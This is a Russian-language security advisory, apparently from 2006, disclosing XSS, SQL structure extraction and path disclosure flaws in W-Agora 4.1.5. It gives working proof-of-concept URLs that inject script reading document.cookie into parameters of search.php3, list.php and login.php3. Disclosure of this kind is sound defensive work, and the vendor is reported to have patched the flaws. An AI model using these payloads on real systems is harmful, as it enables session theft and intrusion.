|
Здравствуйте 3APA3A!
Сообщаю вам о найденных мною 22.11.2006 уязвимостях в W-Agora 4.1.5 (<= 4.1.5). Это Cross-Site Scripting, SQL DB Structure Extraction та Full path disclosure уязвимости.
Уязвимости в скрипте search.php3.
XSS:
http://site/news/search.
php3?site=x&bn=y_news&gosearch=1&sf=1&pattern=%3Cscript%3
Ealert(document.cookie)%3C/script%3E
SQL DB Structure Extraction:
http://site/news/search.
php3?site=x&bn=y_news&gosearch=1&sf=1&pattern=xxxxxxxxxx
Уязвимости в скрипте list.php.
XSS:
http://site/static/list.php?key=%3Cscript%3Ealert(document.
cookie)%3C/script%3E
http://site/static/list.php?key=-1102352364
Уязвимости в скрипте login.php3.
XSS:
http://site/news/login.
php3?site=x&bn=y_news&loginform=1&loginuser=%22%3E%3Cscri
pt%3Ealert(document.cookie)%3C/script%3E
http://site/news/login.
php3?site=x&bn=y_news&loginform=1&loginpassword=%22%3E%3C
script%3Ealert(document.cookie)%3C/script%3E
http://site/news/login.
php3?site=x&bn=y_news&loginform=1&redirect_url=%22%3E%3Cs
cript%3Ealert(document.cookie)%3C/script%3E
http://site/news/login.
php3?site=x&bn=y_news&loginform=1&editsite=%22%3E%3Cscrip
t%3Ealert(document.cookie)%3C/script%3E
http://site/news/login.
php3?site=x&bn=y_news&loginform=1&userid=%22%3E%3Cscript%
3Ealert(document.cookie)%3C/script%3E
Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/425/
Данные уязвимости имеют место в W-Agora 4.1.5 (и предыдущих версиях). Как мне уже сообщил разработчик системы W-Agora, все упомянутые уязвимости уже исправлены в последней версии 4.2.1. Которая недавно вышла и доступна на сайте разработчика.
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua
|
